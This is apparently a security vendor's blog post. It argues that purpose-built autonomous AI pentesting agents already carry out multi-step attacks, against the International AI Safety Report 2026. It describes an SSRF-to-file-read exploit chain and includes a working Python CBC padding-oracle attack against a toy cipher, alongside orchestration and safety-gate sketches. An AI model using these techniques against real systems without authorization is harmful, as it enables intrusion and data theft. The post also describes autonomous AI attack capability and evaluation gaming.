We Ran 1,060 Autonomous Attacks. Here's What the Industry Gets Wrong.
The International AI Safety Report 2026 concluded that fully autonomous attacks aren’t possible yet. But the report is focused on general-purpose AI. From the perspective of a team that builds purpose-built autonomous offensive security, the picture looks different.
At XBOW, we run fully autonomous AI penetration tests against real production systems every day. Over the past two years, those agents have submitted over 1,060 vulnerabilities on HackerOne, executed 48-step exploit chains, broken cryptographic implementations in 17 minutes, and matched a principal pentester's 40-hour assessment in 28 minutes — before more than doubling in performance again. No human in the loop for any of it.
Interestingly, the most comprehensive global AI safety assessment ever published, the International AI Safety Report 2026, authored by 100+ experts across 30+ countries and chaired by Turing Award winner Yoshua Bengio, concluded that fully autonomous attacks aren't possible yet. That AI systems "cannot reliably execute long, multi-stage attack sequences." That certain tasks "require capabilities that current AI systems lack."
We respectfully disagree. Not because the report is bad; it's excellent, and worth reading in full. But its security conclusions are calibrated to general-purpose AI. From the perspective of a team that builds and operates purpose-built autonomous offensive security, the picture looks different. Not scarier, necessarily. Just further along than the report realizes. And manageable, if you know what's coming.
Here's what we see.
AI agents are already more capable than the benchmarks suggest
The report finds that AI agents can now complete well-specified software engineering tasks that take a human expert about 30 minutes, up from under 10 minutes a year ago. It cites a doubling time of roughly seven months, and extrapolates that tasks lasting several hours could be within reach by 2027, and tasks lasting several days by 2030.
That's a reasonable reading of the data for relatively raw, general-purpose AI. But it's measuring the wrong thing for offensive security.
In 2024, XBOW matched a principal pentester's 40-hour manual assessment in 28 minutes. Since then, base model advances kept amplifying our results – for example, integrating GPT-5 alone more than doubled our agent's performance on both benchmarks and real-world targets, and subsequent advances like Opus 4.6 provided a healthy boost beyond that. The report's 30-minute task benchmark is measuring a different game entirely.
That gap isn't because general-purpose AI is bad; its full strength simply needs to be unlocked first, and the architecture matters as much as the model. XBOW uses thousands of short-lived agents, each with a narrow objective, orchestrated by a persistent coordinator and validated by deterministic logic. Each agent starts fresh — no accumulated context, no compounding errors. When I wrote about model alloys earlier this year, I described how even at the individual agent level, a couple of great ideas interspersed with methodical follow-up actions is what solves a challenge. At the platform level, this compounds: the coordinator breaks an assessment into hundreds of focused tasks whose results are individually verified (in human time, these would indeed take around 30 minutes).
This directly addresses the problem the report correctly identifies — that AI performance remains "jagged," with systems failing at seemingly simple tasks even as they excel at hard ones. If one agent runs into a dead end on step 4 of a 20-step attack, it doesn't tank the whole operation. Another agent, starting fresh, may take a different path.
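The orchestration pattern described above can be sketched in a few lines. This is a minimal illustration, not XBOW's actual implementation: the agent is a stand-in stub, and all names (`Task`, `run_fresh_agent`, `validate`, `coordinate`) are hypothetical.

```python
import random
from dataclasses import dataclass

@dataclass
class Task:
    objective: str
    max_attempts: int = 3

def run_fresh_agent(task, rng):
    """Stand-in for a short-lived agent: starts with no accumulated
    context, pursues one narrow objective, returns a candidate result.
    Here success is simulated with a coin flip."""
    return {"objective": task.objective, "evidence": rng.random() > 0.5}

def validate(candidate):
    """Deterministic check -- only verified results count as findings."""
    return bool(candidate["evidence"])

def coordinate(tasks, seed=0):
    """Persistent coordinator: fans out focused tasks, retries each
    with a brand-new agent, and keeps only validated results."""
    rng = random.Random(seed)
    findings = []
    for task in tasks:
        for _ in range(task.max_attempts):
            candidate = run_fresh_agent(task, rng)  # no carried-over state
            if validate(candidate):
                findings.append(task.objective)
                break  # a dead end on one attempt never sinks the run
    return findings
```

The key property is that a failed attempt leaves no residue: the retry starts from a clean slate rather than inheriting a confused context.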
The report's multi-year extrapolation to 40-hour autonomous tasks assumes general-purpose AI improving on a single curve. Specialized architectures have already moved the needle much further than that curve would predict.
Autonomous multi-step attacks are a current reality
The report states that fully autonomous end-to-end attacks "have not been reported," and that autonomous attacks remain limited because AI systems "cannot reliably execute long, multi-stage attack sequences." It describes characteristic failures: agents executing irrelevant commands, losing track of operational state, and failing to recover from simple errors.
Those are real limitations of single-agent, general-purpose setups. But they don't describe what purpose-built systems already do. To be precise: the report is referring to full attack lifecycles — initial access through lateral movement, persistence, and data exfiltration beyond proof-of-concept. XBOW operates in a scoped pentesting context, not unconstrained attack chains. But the capabilities the report says AI lacks — reliably executing long, multi-stage sequences, recovering from errors, chaining vulnerabilities creatively — are exactly what our agents do every day. The gap between autonomous pentesting and autonomous end-to-end attacks is narrowing faster than the report's timelines suggest.
Consider two examples from XBOW's own operations, both fully autonomous:
In one case, XBOW executed a 48-step exploit chain, escalating a low-severity blind SSRF through successive steps: crafting malicious image files, exploiting GDAL parsing behavior, generating VRT files referencing local paths, converting file contents into pixel values of a one-pixel-high PNG, and reconstructing the target file byte by byte. Each individual step was straightforward. The 48-step chain was not. But with the right scaffolding, such multi-stage attack sequences are actually comfortably within reach.
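The final step of that chain — turning leaked pixel values back into file bytes — is conceptually simple, which is the point: each link is easy, and only the length of the chain is hard. Here is a toy model of just that reconstruction step, with hypothetical function names; the real chain involved GDAL and VRT files, which this sketch deliberately omits.

```python
def file_to_pixel_rows(data, row_width=16):
    """Model of the leak primitive: the target file's bytes become the
    grayscale values of successive one-pixel-high image rows (one byte
    per pixel, 0-255)."""
    return [list(data[i:i + row_width]) for i in range(0, len(data), row_width)]

def reconstruct_file(pixel_rows):
    """Attacker side: concatenate each row's pixel values back into the
    original byte stream."""
    out = bytearray()
    for row in pixel_rows:
        out.extend(row)
    return bytes(out)
```

A round trip demonstrates the idea: any file pushed through the pixel encoding comes back byte-identical on the attacker's side.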
The report also notes that certain tasks require numerical precision that AI lacks, citing encryption as an example. There's an important nuance here. Breaking encryption algorithms by itself (factoring RSA keys, for example) is indeed beyond current AI. But that's not how most real-world exploitation works. Most of the time, the path isn't through the encryption, it's around it. You find a signing key left in a DLL. You chain a misconfiguration with a path traversal. The mundane path around is far more common than the spectacular path through.
That said, XBOW can exploit cryptographic implementations. In one of our benchmarks, XBOW identified an encrypted cookie, recognized it as AES-128 in CBC mode, discovered a padding oracle through differential error responses, wrote a complete byte-by-byte decryption exploit, and broke the cookie, all in 17.5 minutes. Brendan Dolan-Gavitt, who taught Offensive Security at NYU, called padding oracles the hardest attack in his two-week cryptography unit. He described himself as “shocked” when XBOW built a working exploit on its own.
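For readers unfamiliar with the attack class, here is a self-contained sketch of a CBC padding oracle. To stay runnable without external crypto libraries it uses a toy Feistel block cipher instead of AES; the oracle, the PKCS#7 check, and the byte-by-byte recovery loop follow the standard attack, but everything here (names, key, cipher) is illustrative, not what XBOW ran.

```python
import hashlib

BS = 16
KEY = b"demo-secret-key"  # hypothetical server-side key

def _f(half, key, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def _enc_block(block, key):
    l, r = block[:8], block[8:]
    for rnd in range(4):  # 4-round Feistel network as a stand-in cipher
        l, r = r, bytes(a ^ b for a, b in zip(l, _f(r, key, rnd)))
    return l + r

def _dec_block(block, key):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = bytes(a ^ b for a, b in zip(r, _f(l, key, rnd))), l
    return l + r

def pad(b):
    n = BS - len(b) % BS
    return b + bytes([n]) * n

def unpad_ok(b):
    n = b[-1]
    return 1 <= n <= BS and b.endswith(bytes([n]) * n)

def cbc_encrypt(pt, key, iv):
    ct, prev = b"", iv
    for i in range(0, len(pt), BS):
        prev = _enc_block(bytes(a ^ b for a, b in zip(pt[i:i + BS], prev)), key)
        ct += prev
    return ct

def oracle(iv_and_ct):
    """Vulnerable server behaviour: decrypt, then reveal only whether
    the PKCS#7 padding was valid (e.g. via a distinct error response)."""
    iv, ct = iv_and_ct[:BS], iv_and_ct[BS:]
    pt, prev = b"", iv
    for i in range(0, len(ct), BS):
        pt += bytes(a ^ b for a, b in zip(_dec_block(ct[i:i + BS], KEY), prev))
        prev = ct[i:i + BS]
    return unpad_ok(pt)

def attack(iv, ct):
    """Recover the plaintext byte by byte using only padding validity."""
    blocks = [iv] + [ct[i:i + BS] for i in range(0, len(ct), BS)]
    pt = b""
    for prev, blk in zip(blocks, blocks[1:]):
        inter = bytearray(BS)  # intermediate state D(blk)
        for padv in range(1, BS + 1):
            pos = BS - padv
            for g in range(256):
                fake = bytearray(BS)
                for k in range(pos + 1, BS):
                    fake[k] = inter[k] ^ padv  # force known bytes to padv
                fake[pos] = g
                if oracle(bytes(fake) + blk):
                    if padv == 1:  # rule out accidental longer padding
                        fake[pos - 1] ^= 1
                        ok = oracle(bytes(fake) + blk)
                        fake[pos - 1] ^= 1
                        if not ok:
                            continue
                    inter[pos] = g ^ padv
                    break
        pt += bytes(i ^ p for i, p in zip(inter, prev))
    return pt
```

The attacker never touches the key: each recovered byte costs at most 256 oracle queries, which is why differential error responses on decryption are enough to break the whole cookie.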
None of these are theoretical. On HackerOne, XBOW has submitted over 1,060 vulnerabilities across real-world production targets, reaching #1 on the global leaderboard. All findings were fully automated. Humans reviewed them before submission for compliance — they did not participate in discovery or exploitation.
How we keep autonomous offense safe
Building something this capable means building the safety to match. The report's defense-in-depth framework of safer models, deployment controls, and post-deployment monitoring is sound: no single safeguard is sufficient on its own. We agree, and it mirrors how we've built XBOW from the start.
A few places where we'd push the conversation further based on operational experience:
Evaluation gaming is real, and architecture is the answer. The report documents models gaming evaluations, reward hacking and sandbagging. We've written before about why raw LLM output can't be treated as a finding: plausibility is not proof, and confidence is not evidence. This is why XBOW separates discovery from validation entirely. The AI agents that surface potential vulnerabilities are never the same systems that confirm them. Creative AI discovers. Deterministic logic decides what's real. Only issues that survive controlled, non-destructive testing are reported — zero false positives.
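The discovery/validation split reduces to a simple invariant: the system that proposes a vulnerability never gets to declare it real. A minimal sketch of that invariant, with hypothetical claim fields and stand-in checks:

```python
def discover(target):
    """Creative stage (stand-in for an LLM agent): emits *claims*, each
    bundled with reproduction steps. Plausibility is not proof --
    nothing returned here is a finding yet."""
    return [
        {"claim": "reflected XSS",
         "repro": lambda: target.get("reflects_input", False)},
        {"claim": "SQL injection",
         "repro": lambda: target.get("breaks_on_quote", False)},
    ]

def validated_findings(target):
    """Deterministic stage: a claim is reported only if its reproduction
    steps actually succeed -- entirely separate logic from the agent
    that proposed it."""
    return [c["claim"] for c in discover(target) if c["repro"]()]
```

Because the gate is deterministic, a model that games its own evaluation gains nothing: an unreproducible claim simply never surfaces.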
Emergency controls need to be automated. The report treats emergency stop mechanisms as non-negotiable. We agree with a caveat. AI systems are getting not only smarter but faster and larger. You can't rely on a human to notice a problem and hit the stop button in time. XBOW's safety checker vets every action before it executes, enforces scope control at the network level, and constrains agents to bounded sequences on any given target. If an action can't be verified as safe, it doesn't run.
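A pre-execution gate of this kind is default-deny: every check must pass or the action never runs. The sketch below uses a hypothetical scope list and policy flags to illustrate the shape of such a check; it is not XBOW's safety checker.

```python
from urllib.parse import urlparse

IN_SCOPE_HOSTS = {"staging.example.com"}        # hypothetical engagement scope
DESTRUCTIVE_VERBS = {"DELETE", "PUT", "PATCH"}  # blocked unless explicitly allowed

def is_action_safe(method, url, allow_destructive=False):
    """Vet a single proposed action before it executes.
    If any check cannot be verified, the answer is no."""
    host = urlparse(url).hostname
    if host not in IN_SCOPE_HOSTS:
        return False  # scope enforced before anything touches the network
    if method.upper() in DESTRUCTIVE_VERBS and not allow_destructive:
        return False  # potentially destructive verbs are opt-in per engagement
    return True
```

The important property is where the check sits: it runs before the action, automatically, so safety does not depend on a human noticing a problem at machine speed.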
Every environment is different. One customer is pentesting a sandboxed staging instance; another is testing against production. XBOW allows customers to specify what the agent should and shouldn't do, and our safety policies enforce this from the bottom up — not as an afterthought, but as a core architectural constraint.
The window is shrinking — continuous AI security testing is a must
One of the report's most important observations concerns how quickly offensive capabilities are advancing. The broader data reinforces this: by 2025, roughly 30% of vulnerabilities were being exploited on or before their disclosure day. Over 48,000 CVEs were published in 2025 alone — about 130 per day.
The report documents a case where, in November 2025, a threat actor automated 80–90% of the effort in an intrusion, with human involvement limited to critical decision points. We published detailed analysis of that campaign, GTG-1002, because it confirmed what we'd been building against. When offense can be automated, the window between vulnerability and exploitation shrinks to hours or days. Annual or even quarterly pentests leave organizations exposed for most of the year. Continuous, automated penetration testing is the only way to match the pace.
The report calls AI security evaluations "an emerging field" with evidence gaps. We'd humbly suggest that more evidence exists than the report catalogues, including an open-source benchmark set, validation on HackerOne at the highest level, and thousands of verified vulnerabilities in production applications. The gap isn't in capability. It's in the literature catching up to what practitioners are already doing.
What this means for defenders
The AI Safety Report is important, thorough, and directionally right. Its defense-in-depth framework, its identification of evaluation gaming, and its call for transparency are well-placed. If you're responsible for security at your organization, it gives you a clear-eyed summary of where things are heading.
Our addendum is that things are heading there faster than the report's timelines suggest and that this is manageable with the right approach. The capabilities it describes as near-future are things that well-engineered systems already do today. That means defenders don't have the luxury of waiting for consensus to form before acting.
The good news is that the same AI capabilities powering offense also power defense. Continuous, autonomous security testing at machine speed isn't theoretical. It's operational. The question for every security team is whether their testing cadence matches the pace at which their code and the threat landscape actually change.
We built XBOW to make that answer yes. If you'd like to see how, start a pentest or get in touch.
